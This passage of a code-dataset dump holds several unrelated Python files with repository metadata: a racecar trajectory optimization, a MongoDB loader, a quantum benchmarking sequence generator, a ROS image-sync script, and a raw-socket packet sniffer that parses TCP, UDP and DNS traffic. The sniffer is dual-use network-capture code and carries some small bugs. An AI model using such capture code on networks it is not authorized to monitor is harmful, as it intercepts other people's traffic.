8.0\nay_ref = 8.0\ndelta_ref = 0.04\nthrust_ref = 10.0\n\n# Define states\nphase.add_state(\n \"t\",\n ref=t_ref,\n units=\"s\",\n fix_initial=True,\n fix_final=False,\n lower=0.0,\n upper=10000.0,\n rate_source=\"dt_ds\",\n)\n\n# Normal distance to centerline. 
The bounds on n define the width of the track\nphase.add_state(\n \"n\",\n ref=n_ref,\n units=\"m\",\n fix_initial=False,\n fix_final=False,\n upper=4.0,\n lower=-4.0,\n rate_source=\"dn_ds\",\n targets=[\"n\"],\n)\n\n# velocity\nphase.add_state(\n \"V\",\n ref=V_ref,\n ref0=5,\n units=\"m/s\",\n fix_initial=False,\n fix_final=False,\n lower=-500.0,\n upper=500.0,\n rate_source=\"dV_ds\",\n targets=[\"V\"],\n)\n\n# vehicle heading angle with respect to centerline\nphase.add_state(\n \"alpha\",\n ref=alpha_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_source=\"dalpha_ds\",\n targets=[\"alpha\"],\n)\n\n# vehicle slip angle, or angle between the axis of the vehicle\n# and velocity vector (all cars drift a little)\nphase.add_state(\n \"lambda\",\n ref=lambda_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_source=\"dlambda_ds\",\n targets=[\"lambda\"],\n)\n\n# yaw rate\nphase.add_state(\n \"omega\",\n ref=omega_ref,\n units=\"rad/s\",\n fix_initial=False,\n fix_final=False,\n lower=-30.0,\n upper=30.0,\n rate_source=\"domega_ds\",\n targets=[\"omega\"],\n)\n\n# longitudinal acceleration\nphase.add_state(\n \"ax\",\n ref=ax_ref,\n units=\"m/s**2\",\n fix_initial=False,\n fix_final=False,\n lower=-100.0,\n upper=100.0,\n rate_source=\"dax_ds\",\n targets=[\"ax\"],\n)\n\n# Lateral acceleration\nphase.add_state(\n \"ay\",\n ref=ay_ref,\n units=\"m/s**2\",\n fix_initial=False,\n fix_final=False,\n lower=-100.0,\n upper=100.0,\n rate_source=\"day_ds\",\n targets=[\"ay\"],\n)\n\n# Define Controls\n\n# steering angle\nphase.add_control(\n name=\"delta\",\n ref=delta_ref,\n units=\"rad\",\n fix_initial=False,\n fix_final=False,\n lower=-0.5 * np.pi,\n upper=0.5 * np.pi,\n rate_continuity=True,\n)\n\n# the thrust controls the longitudinal force of the rear tires and is positive\n# while accelerating, negative while braking\nphase.add_control(\n name=\"thrust\",\n ref=thrust_ref,\n units=None,\n lower=-1000.0,\n upper=1000.0,\n fix_initial=False,\n fix_final=False,\n rate_continuity=True,\n)\n\n# Performance Constraints\npmax = 960000.0 # W\nphase.add_path_constraint(\"power\", upper=pmax, ref=100000.0) # engine power limit\n\n# The following four constraints are the tire friction limits, with 'rr' designating the\n# rear right wheel etc. This limit is computed in tireConstraintODE.py\nphase.add_path_constraint(\"c_rr\", upper=1.0)\nphase.add_path_constraint(\"c_rl\", upper=1.0)\nphase.add_path_constraint(\"c_fr\", upper=1.0)\nphase.add_path_constraint(\"c_fl\", upper=1.0)\n\n# Some of the vehicle design parameters are available to set here. 
Other parameters can\n# be found in their respective ODE files.\n# vehicle mass\nphase.add_parameter(\n \"M\",\n val=800.0,\n units=\"kg\",\n opt=False,\n targets=[\"car.M\", \"tire.M\", \"tireconstraint.M\", \"normal.M\"],\n static_target=True,\n)\n\n# brake bias\nphase.add_parameter(\n \"beta\", val=0.62, units=None, opt=False, targets=[\"tire.beta\"], static_target=True\n)\n\n# center of pressure location\nphase.add_parameter(\n \"CoP\", val=1.6, units=\"m\", opt=False, targets=[\"normal.CoP\"], static_target=True\n)\n\n# center of gravity height\nphase.add_parameter(\n \"h\", val=0.3, units=\"m\", opt=False, targets=[\"normal.h\"], static_target=True\n)\n\n# roll stiffness\nphase.add_parameter(\n \"chi\", val=0.5, units=None, opt=False, targets=[\"normal.chi\"], static_target=True\n)\n\n# downforce coefficient*area\nphase.add_parameter(\n \"ClA\", val=4.0, units=\"m**2\", opt=False, targets=[\"normal.ClA\"], static_target=True\n)\n\n# drag coefficient*area\nphase.add_parameter(\n \"CdA\", val=2.0, units=\"m**2\", opt=False, targets=[\"car.CdA\"], static_target=True\n)\n\n# Minimize final time.\n# note that we use the 'state' time instead of Dymos 'time'\nphase.add_objective(\"t\", loc=\"final\")\n\n# Add output timeseries\nphase.add_timeseries_output(\"*\")\nphase.add_timeseries_output(\"t\", output_name=\"time\")\n\n# Link the states at the start and end of the phase in order to ensure a continuous lap\ntraj.link_phases(\n phases=[\"phase0\", \"phase0\"],\n vars=[\"V\", \"n\", \"alpha\", \"omega\", \"lambda\", \"ax\", \"ay\"],\n locs=[\"final\", \"initial\"],\n connected=True,\n)\n\n# Set up the optimization driver\np.driver = ParOptSparseDriver()\n\noptions = {\n \"algorithm\": \"ip\",\n \"norm_type\": \"infinity\",\n \"qn_type\": \"bfgs\",\n \"qn_subspace_size\": 10,\n \"starting_point_strategy\": \"least_squares_multipliers\",\n \"qn_update_type\": \"damped_update\",\n \"abs_res_tol\": 1e-6,\n \"barrier_strategy\": \"monotone\",\n \"armijo_constant\": 1e-5,\n \"penalty_gamma\": 100.0,\n \"max_major_iters\": 500,\n}\n\nfor key in options:\n p.driver.options[key] = options[key]\n\n# Allow OpenMDAO to automatically determine our sparsity pattern.\n# Doing so can significantly speed up the execution of Dymos.\np.driver.declare_coloring(show_summary=True, show_sparsity=False)\n\n# Setup the problem\np.setup(check=True)\n\n# States\n# Nonzero velocity to avoid division by zero errors\np.set_val(\"traj.phase0.states:V\", phase.interp(\"V\", [20, 20]), units=\"m/s\")\n\n# All other states start at 0\np.set_val(\n \"traj.phase0.states:lambda\", phase.interp(\"lambda\", [0.01, 0.01]), units=\"rad\"\n)\np.set_val(\"traj.phase0.states:omega\", phase.interp(\"omega\", [0.0, 0.0]), units=\"rad/s\")\np.set_val(\"traj.phase0.states:alpha\", phase.interp(\"alpha\", [0.0, 0.0]), units=\"rad\")\np.set_val(\"traj.phase0.states:ax\", phase.interp(\"ax\", [0.0, 0.0]), units=\"m/s**2\")\np.set_val(\"traj.phase0.states:ay\", phase.interp(\"ay\", [0.0, 0.0]), units=\"m/s**2\")\np.set_val(\"traj.phase0.states:n\", phase.interp(\"n\", [0.0, 0.0]), units=\"m\")\n\n# initial guess for what the final time should be\np.set_val(\"traj.phase0.states:t\", phase.interp(\"t\", [0.0, 100.0]), units=\"s\")\n\n# Controls\n# A small amount of thrust can speed up convergence\np.set_val(\"traj.phase0.controls:delta\", phase.interp(\"delta\", [0.0, 0.0]), units=\"rad\")\np.set_val(\"traj.phase0.controls:thrust\", phase.interp(\"thrust\", [0.1, 0.1]), units=None)\n\np.run_driver()\nprint(\"Optimization finished\")\n\n# Get 
optimized time series\nn = p.get_val(\"traj.phase0.timeseries.states:n\")\ns = p.get_val(\"traj.phase0.timeseries.s\")\nV = p.get_val(\"traj.phase0.timeseries.states:V\")\nthrust = p.get_val(\"traj.phase0.timeseries.controls:thrust\")\ndelta = p.get_val(\"traj.phase0.timeseries.controls:delta\")\npower = p.get_val(\"traj.phase0.timeseries.power\", units=\"W\")\n\nprint(\"Plotting\")\n\n# Plot the main vehicle telemetry\nfig, axes = plt.subplots(nrows=4, ncols=1, figsize=(15, 8))\n\n# Velocity vs s\naxes[0].plot(s, p.get_val(\"traj.phase0.timeseries.states:V\"), label=\"solution\")\n\naxes[0].set_xlabel(\"s (m)\")\naxes[0].set_ylabel(\"V (m/s)\")\naxes[0].grid()\naxes[0].set_xlim(0, s_final)\n\n# n vs s\naxes[1].plot(\n s, p.get_val(\"traj.phase0.timeseries.states:n\", units=\"m\"), label=\"solution\"\n)\n\naxes[1].set_xlabel(\"s (m)\")\naxes[1].set_ylabel(\"n (m)\")\naxes[1].grid()\naxes[1].set_xlim(0, s_final)\n\n# throttle vs s\naxes[2].plot(s, thrust)\n\naxes[2].set_xlabel(\"s (m)\")\naxes[2].set_ylabel(\"thrust\")\naxes[2].grid()\naxes[2].set_xlim(0, s_final)\n\n# delta vs s\naxes[3].plot(\n s, p.get_val(\"traj.phase0.timeseries.controls:delta\", units=None), label=\"solution\"\n)\n\naxes[3].set_xlabel(\"s (m)\")\naxes[3].set_ylabel(\"delta\")\naxes[3].grid()\naxes[3].set_xlim(0, s_final)\n\nplt.tight_layout()\n\n# Performance constraint plot. Tire friction and power constraints\nfig, axes = plt.subplots(nrows=1, ncols=1, figsize=(15, 4))\nplt.subplots_adjust(right=0.82, bottom=0.14, top=0.97, left=0.07)\n\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_fl\", units=None), label=\"c_fl\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_fr\", units=None), label=\"c_fr\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_rl\", units=None), label=\"c_rl\")\naxes.plot(s, p.get_val(\"traj.phase0.timeseries.c_rr\", units=None), label=\"c_rr\")\n\naxes.plot(s, power / pmax, label=\"Power\")\n\naxes.legend(bbox_to_anchor=(1.04, 0.5), loc=\"center left\")\naxes.set_xlabel(\"s (m)\")\naxes.set_ylabel(\"Performance constraints\")\naxes.grid()\naxes.set_xlim(0, s_final)\n\nplt.show()\n", "repo_name": "smdogroup/paropt", "sub_path": "examples/dymos/racecar/racecar.py", "file_name": "racecar.py", "file_ext": "py", "file_size_in_byte": 10178, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dymos.examples.racecar.tracks.ovaltrack", "line_number": 14, "usage_type": "name"}, {"api_name": "dymos.examples.racecar.spline.get_track_points", "line_number": 18, "usage_type": "call"}, {"api_name": "dymos.examples.racecar.spline.get_spline", "line_number": 21, "usage_type": "call"}, {"api_name": "openmdao.api.Problem", "line_number": 27, "usage_type": "call"}, {"api_name": "openmdao.api", "line_number": 27, "usage_type": "name"}, {"api_name": "openmdao.api.Group", "line_number": 27, "usage_type": "call"}, {"api_name": "dymos.Trajectory", "line_number": 30, "usage_type": "call"}, {"api_name": "dymos.Phase", "line_number": 34, "usage_type": "call"}, {"api_name": "dymos.examples.racecar.combinedODE.CombinedODE", "line_number": 35, "usage_type": "name"}, {"api_name": "dymos.GaussLobatto", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 131, "usage_type": "attribute"}, 
{"api_name": "numpy.pi", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 185, "usage_type": "attribute"}, {"api_name": "paropt.paropt_sparse_driver.ParOptSparseDriver", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 376, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}]}
+{"seq_id": "43093494100", "text": "import pymongo\nimport json\nfrom getCardSet import get_setids, default_setids_path\n\nport = 27017\nusername = None\npassword = None\nclient = pymongo.MongoClient(host='localhost', port=27017)\ndb = client['artifact']\n\n\ndef load_cardset(setid):\n with open('save/' + setid + '.json') as f:\n cardset = json.load(f)\n return cardset\n\n\ndef extract_cardset_info(cardset_json):\n cardset_info = cardset_json['set_info']\n set_id = cardset_info['set_id']\n set_name = cardset_info['name']['english']\n return set_id, set_name\n\n\nsetids = get_setids(default_setids_path)\nfor set_id in setids:\n cardset = load_cardset(set_id)['card_set']\n set_id, set_name = extract_cardset_info(cardset)\n collection = db[str(set_id)]\n card_list = cardset['card_list']\n for card in card_list:\n collection.insert_one(card)\n", "repo_name": "PlumPeanut/ArtifactCard-Python3", "sub_path": "dataBase.py", "file_name": "dataBase.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "getCardSet.get_setids", "line_number": 25, "usage_type": "call"}, {"api_name": "getCardSet.default_setids_path", "line_number": 25, "usage_type": "argument"}]}
+{"seq_id": "72445389849", "text": "\"\"\"\n#Create set of pulses for single qubit randomized benchmarking sequence. \n\nCreated on Tue Feb 07 15:01:37 2012\n\n@authors: Colm Ryan and Marcus Silva\n\"\"\"\nimport numpy as np\nfrom functools import reduce\n\nimport csv\n\ndef memoize(function):\n\tcache = {}\n\tdef decorated(*args):\n\t\tif args not in cache:\n\t\t\tcache[args] = function(*args)\n\t\treturn cache[args]\n\treturn decorated\n\n@memoize\ndef pauli_multiply(P1, P2):\n '''\n Multiplication table for single qubit cliffords. Note this assumes C1 is applied first. \n '''\n tmpMult = np.dot(Paulis[P2].matrix,Paulis[P1].matrix)\n checkArray = np.array([np.abs(np.trace(np.dot(tmpMult.transpose().conj(),Paulis[x].matrix))) for x in range(1,5)])\n return checkArray.argmax()+1\n\n\n#Number of gates that we want\ngateLengths = np.array([2, 4, 8, 16, 32, 64, 96, 128, 192, 256, 320])\n\n#Number of randomizations\nnumRandomizations = 32\n\n#Single qubit paulis\nX = np.array([[0, 1],[1, 0]])\nY = np.array([[0, -1j],[1j, 0]])\nZ = np.array([[1, 0],[0, -1]]);\nI = np.eye(2)\n\n#Basically a structure to contain some infor about the Cliffords\nclass Pauli(object):\n def __init__(self, matrix, inverse):\n self.matrix = matrix\n self.inverse = inverse\n \n#Basis Cliffords\nPaulis = {}\nPaulis[1] = Pauli(I, 1)\nPaulis[2] = Pauli(X, 2)\nPaulis[3] = Pauli(Y, 3)\nPaulis[4] = Pauli(Z, 4)\n\ntargetGate = 1\n\n#Generate random sequence of Paulis for each number of gates we want to look at and repeat numRandomization times\nrandPauliLists = [np.random.randint(1,5, gatect-1).tolist() for gatect in gateLengths for randct in range(numRandomizations) ] \n\n#Interleave gate of interest\n#interLeavedGateLists = [np.vstack((tmpGateList, targetGate*np.ones_like(tmpGateList))).flatten(order='F').tolist() for tmpGateList in randPauliLists]\n \n#For each sequence calculate inverse and the X sequence and append the final Clifford\nrandomISeqs = []\n#randomXSeqs = []\nfor tmpPauliSeq in randPauliLists:\n totalPauli = reduce(pauli_multiply, tmpPauliSeq)\n inversePauli = Paulis[totalPauli].inverse\n# inverseCliffX = clifford_multiply(inverseCliff, 2)\n randomISeqs.append(tmpPauliSeq + [inversePauli])\n# randomXSeqs.append(tmpSeq + [inverseCliffX]) \n \n\n#Write out the files now\nwith open('PauliTwirl_ISeqs.txt','wt') as ISeqFID:\n writer = csv.writer(ISeqFID)\n writer.writerows(randomISeqs)\n\n#with open('PauliTwirl_XSeqs.txt','wt') as XSeqFID:\n# writer = csv.writer(XSeqFID)\n# writer.writerows(randomXSeqs)\n\n\n\n\n\n \n\n \n \n \n \n", "repo_name": "BBN-Q/Qlab", "sub_path": "experiments/muWaveDetection/sequences/CreatePauliTwirlSeq.py", "file_name": "CreatePauliTwirlSeq.py", "file_ext": "py", "file_size_in_byte": 2501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 38, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.dot", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.trace", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 41, "usage_type": "call"}, 
{"api_name": "numpy.random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 68, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "14551109132", "text": "import socket, sys\nimport struct\nfrom struct import *\nfrom dnslib import DNSRecord\nimport binascii\nimport time\nimport pprint\n# import FilterAgent.network\nclass compiledPacket:\n \n def __init__(self):\n self.ips = []\n self.tcps = []\n self.dns = []\n \n def add(self,packettype,packet):\n if packettype == 'IP':\n self.ips.append(packet)\n elif packettype == 'TCP':\n self.tcps.append(packet)\n elif packettype == 'DNS' or packettype == 'UDP':\n self.dns.append(packet)\n else:\n raise error\n \nclass dataPacket:\n \n '''\n Data class that can be sent to the central\n '''\n def __init__(self,ipVersion,ipHLength,ttl,protocol,sourceAddr,destAddr,sourcePort,destPort,seqNum,Ack):\n self.ipVersion = ipVersion\n self.ipHLength = ipHLength\n self.ttl = ttl\n self.protocol = protocol\n self.sourceAddr= sourceAddr\n self.destAddr = destAddr\n self.sourcePort= sourcePort\n self.destPort = destPort\n self.seqNum = seqNum\n self.Ack = Ack\n\nclass udpPacket:\n '''\n UDP stored data\n '''\n def __init__(self,sourcePort,destPort,length,data):\n self.sourcePort = sourcePort\n self.destPort = destPort\n self.length = length\n self.data = data\n \ndef eth_addr (a) :\n\tb = \"%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\" % (ord(a[0]) , ord(a[1]) , ord(a[2]), ord(a[3]), ord(a[4]) , ord(a[5]))\n\treturn b\n\ndef decode_label(message, offset):\n\tlabels = []\n\t\t\t\n\twhile True:\n\t\tlength, = struct.unpack_from(\"!B\", message, offset)\n\t\t\n\t\tif(length & 0xC0) == 0xC0:\n\t\t\tpointer, = struct.unpack_from(\"!H\", message, offset)\n\t\t\toffset += 2\n\t\t\treturn labels + decode_label(message, pointer & 0x3FFF),offset\n\t\t\t\n\t\tif(length & 0xC0) != 0x00:\n\t\t\traise StandardError(\"Unknown labelencoding\")\n\t\t\t\n\t\toffset += 1\n\t\t\n\t\tif length == 0:\n\t\t\treturn labels, offset\n\t\t\n\t\tlabels.append(*struct.unpack_from(\"!%ds\" % length, offset))\n\t\toffset += length\n\nDNS_QUERY_SECTION_FORMAT = struct.Struct(\"!2H\")\n\ndef decode_question_section(message, offset, qdcount):\n\tquestions = []\n\tfor _ in range(qdcount):\n\t\tqname, offset = decode_label(message, offset)\n\t\t\n\t\tqtype, qclass = DNS_QUERY_SECTION_FORMAT.unpack_from(message,offset)\n\t\toffset += DNS_QUERY_SECTION_FORMAT.size\n\t\tprint(message)\n\t\tquestion = {\"domain_name\":qname,\n\t\t\t\t\t\"query_type\":qtype,\n\t\t\t\t\t\"query_class\":qclass}\n\t\t\t\t\t\n\t\tquestions.append(question)\n\treturn questions, offset\n\n\nDNS_QUERY_MESSAGE_HEADER = struct.Struct(\"!6H\")\n\t\ndef decode_dns_message(message):\n\t\n\tid, misc,qdcount,ancount,nscount,arcount = DNS_QUERY_MESSAGE_HEADER.unpack_from(message)\n\t\n\tqr = (misc & 0x8000) != 0\n\topcode = (misc & 0x7800) >> 11\n\taa = (misc & 0x0400) != 0\n\ttc = (misc & 0x200) != 0\n\trd = (misc & 0x100) != 0\n\tra = (misc & 0x80) != 0\n\tz = (misc & 0x70) != 0\n\trcode = misc & 0xF\n\t\n\toffset = DNS_QUERY_MESSAGE_HEADER.size\n\tquestions, offset = decode_question_section(message, offset, qdcount)\n\t\n\tresult = { \"id\": id,\n\t\t\t \"is_response\": qr,\n\t\t\t \"opcode\":opcode,\n\t\t\t \"is_authoritative\": aa,\n\t\t\t \"is_truncated\":tc,\n\t\t\t \"recursion_desired\":rd,\n\t\t\t \"recursion_available\":ra,\n\t\t\t \"reserved\":z,\n\t\t\t \"response_code\":rcode,\n\t\t\t \"question_count\":qdcount,\n\t\t\t \"answer_count\":ancount,\n\t\t\t \"authority_count\":nscount,\n\t\t\t \"additional_count\":arcount,\n\t\t\t \"questions\": questions}\n\treturn result\n\t\t\t\ndef sniff(duration=5): \n#create an INET, STREAMing socket\n try:\n s = 
socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))\n except socket.error as msg:\n print ('Socket could not be created. Error Code : ' + str(msg))\n sys.exit()\n \n cPacket = compiledPacket()\n # print(cPacket)\n start = time.time()\n print('start time = '+str(start))\n # packet = s.recvfrom(65565)\n # print(binascii.unhexlify(packet[0]))\n # receive a packet\n while True:\n 'started!'\n packet = s.recvfrom(65565)\n #packet string from tuple\n fullSocketReturn = packet\n packet = packet[0]\n try:\n d = DNSRecord.parse(packet)\n print(d)\n except struct.error as err:\n continue\n except RuntimeError as re:\n continue\n #parse ethernet header\n eth_length = 14\n eth_header = packet[:eth_length]\n eth = unpack('!6s6sH', eth_header)\n eth_protocol = socket.ntohs(eth[2])\n #print('Destination MAC' +eth_addr(packet[0:6])+' Source MAC '+eth_addr(packet[6:12])+' Protocol : '+str(eth_protocol))\n \n if eth_protocol == 8:\n \n ip_header = packet[eth_length:20+eth_length]\n \n #now unpack them :)\n iph = unpack('!BBHHHBBH4s4s' , ip_header)\n \n version_ihl = iph[0]\n version = version_ihl >> 4\n ihl = version_ihl & 0xF\n \n iph_length = ihl * 4\n \n ttl = iph[5]\n protocol = iph[6]\n s_addr = socket.inet_ntoa(iph[8]);\n d_addr = socket.inet_ntoa(iph[9]);\n \n #print ('IP Version : ' + str(version) + ' IP Header Length : ' + str(ihl) + ' TTL : ' + str(ttl) + ' Protocol : ' + str(protocol) + ' Source Address : ' + str(s_addr) + ' Destination Address : ' + str(d_addr))\n #print('\\n')\n if protocol == 6: \n tcp_header = packet[iph_length:iph_length+20]\n \n #now unpack them :)\n tcph = unpack('!HHLLBBHHH' , tcp_header)\n \n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n doff_reserved = tcph[4]\n tcph_length = doff_reserved >> 4\n \n #print ('TCP PACKET ::: Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) + ' TCP header length : ' + str(tcph_length))\n \n h_size = iph_length + tcph_length * 4\n data_size = len(packet) - h_size\n \n #get data from the packet\n data = str(packet[h_size:])\n packet = dataPacket(str(version),str(ihl),str(ttl),str(protocol),str(s_addr),\n str(d_addr),str(source_port),str(dest_port),str(sequence),str(acknowledgement));\n cPacket.add('TCP', packet)\n if protocol == 17:\n u = iph_length + eth_length\n udph_length = 8\n udph_header = packet[u:u+8]\n udph = unpack('!HHHH',udph_header)\t\t\t\t\n sourcePort = udph[0]\n destPort = udph[1]\n length = udph[2]\n checksum = udph[3]\n # print(udph)\n h_size = eth_length + iph_length + udph_length\n data_size = len(packet) - h_size\n print ('UDP PACKET ::: Source Port : ' + str(sourcePort) + ' Dest Port : ' + str(destPort) + ' Length : ' \n + str(length) + ' Checksum : ' + str(checksum)+' Data size :'+str(data_size))\n print()\n # print(packet[h_size:])\n #get data from the packet\n data = packet[h_size:]\n # print ('UDP DATA ENCODED\\n')\n # print(type(data))\n # print(repr(data))\n \n try:\n # print(data.decode('ascii'))\n # d = DNSRecord.parse(packet)\n # print(d)\n pprint.pprint(decode_dns_message(packet))\n except UnicodeDecodeError as err:\n # print(err)\n continue\n except binascii.Error as baerr:\n # print(baerr)\n continue\n except struct.error as strerr:\n # print(strerr)\n continue\n except TypeError as te:\n # print(te)\n continue\n except RuntimeError as re:\n continue\n packet = udpPacket(sourcePort, destPort, length, data)\n cPacket.add('UDP', 
packet)\n #return packet \n #print ('Data : ' + data)\n return cPacket\n # printw\n\ntry:\n\tpacket = sniff(0)\nexcept KeyboardInterrupt as ki:\n print('Exiting sniffer! Collected data :: \\n')\n print(packet)\n sys.exit()", "repo_name": "hugokuijzer/Uxx", "sub_path": "FilterAgent/ltcp.py", "file_name": "ltcp.py", "file_ext": "py", "file_size_in_byte": 8652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "struct.unpack_from", "line_number": 61, "usage_type": "call"}, {"api_name": "struct.unpack_from", "line_number": 64, "usage_type": "call"}, {"api_name": "struct.unpack_from", "line_number": 76, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 79, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 97, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 134, "usage_type": "call"}, {"api_name": "socket.AF_PACKET", "line_number": 134, "usage_type": "attribute"}, {"api_name": "socket.SOCK_RAW", "line_number": 134, "usage_type": "attribute"}, {"api_name": "socket.ntohs", "line_number": 134, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 137, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "dnslib.DNSRecord.parse", "line_number": 153, "usage_type": "call"}, {"api_name": "dnslib.DNSRecord", "line_number": 153, "usage_type": "name"}, {"api_name": "struct.error", "line_number": 155, "usage_type": "attribute"}, {"api_name": "socket.ntohs", "line_number": 163, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 181, "usage_type": "call"}, {"api_name": "socket.inet_ntoa", "line_number": 182, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 235, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 239, "usage_type": "attribute"}, {"api_name": "struct.error", "line_number": 242, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 262, "usage_type": "call"}]}
+{"seq_id": "71542508888", "text": "'''\n @Author: JoeyforJoy & ylheng\n @Date: 2022-03-25 15:10:15\n @LastEditTime: 2022-03-29 11:13:51\n @LastEditors: JoeyforJoy\n @Description: Transfer rosbag to synchronized image and pcd files.\n @Example: \n # message should be broadcast first\n rosrun b2x time_sync_cam2.py ${img1_topic} ${img2_topic} --output_dir ${output_dir}\n'''\n\nimport numpy as np\nimport rospy\nimport message_filters\nfrom sensor_msgs.msg import Image, CompressedImage\n\nimport os\nimport sys\nPARENT_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"..\")\nsys.path.append(PARENT_DIR)\nfrom utils import *\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Transfer rosbag to synchronized image and pcd files.\")\n parser.add_argument(\"topic_img1\", type=str, help = \"the name of the image1 topic\")\n parser.add_argument(\"topic_img2\", type=str, help = \"the name of the image2 topic\")\n parser.add_argument(\"--output_dir\", type=str, default=\"./data/synchronized\", \n help = \"the root directory of the output files\")\n parser.add_argument(\"--img1_dir_label\", type=str, default=\"image1\", \n help = \"the subdirectory name of output images\")\n parser.add_argument(\"--img2_dir_label\", type=str, default=\"image2\", \n help = \"the subdirectory name of output images\")\n parser.add_argument(\"--tot\", type=float, default=0.01, \n help = \"the tolerence of time synchronization\")\n return parser.parse_args()\n\nclass callBackClass:\n def __init__(self, output_dir, img1_subdir=\"image1\", img2_subdir=\"image2\",\n img1_compressed = True, img2_compressed = True):\n self.output_dir = output_dir\n self.img1_dir = os.path.join(self.output_dir, img1_subdir)\n self.img2_dir = os.path.join(self.output_dir, img2_subdir)\n \n os.makedirs(self.output_dir, exist_ok=True)\n os.makedirs(self.img1_dir, exist_ok=True)\n os.makedirs(self.img2_dir, exist_ok=True)\n \n self.img1_compressed = img1_compressed\n self.img2_compressed = img2_compressed\n\n self.count = 0\n self.max_count = 1000000\n\n def __call__(self, img1_msg, img2_msg):\n frame_name = \"%06d\" % (self.count)\n # print(\"frame name: %s\\ttimestampe: %s\" % (frame_name, img1_msg.header.stamp))\n\n # transfer img1 msg 2 cv img\n dumpImageMsg(img1_msg, self.img1_dir, frame_name, compressed = self.img1_compressed)\n dumpImageMsg(img2_msg, self.img2_dir, frame_name, compressed = self.img2_compressed)\n\n self.count = (self.count + 1) % self.max_count\n\nif __name__ == \"__main__\":\n rospy.init_node('time_sync_lidar_cam')\n\n args = parse_args()\n\n image1_sub = createImgMsgFilterSubsciber(args.topic_img1)\n image2_sub = createImgMsgFilterSubsciber(args.topic_img2)\n ts = message_filters.ApproximateTimeSynchronizer([image1_sub, image2_sub], 10, args.tot, allow_headerless=True)\n\n img1_compressed = isCompressedImage(args.topic_img1)\n img2_compressed = isCompressedImage(args.topic_img2)\n callback = callBackClass(args.output_dir, img1_compressed = img1_compressed, img2_compressed = img2_compressed)\n ts.registerCallback(callback)\n rospy.spin()\n", "repo_name": "YuanxianH/b2x", "sub_path": "src/b2x/scripts/time_sync_cam2.py", "file_name": "time_sync_cam2.py", "file_ext": "py", "file_size_in_byte": 3254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": 
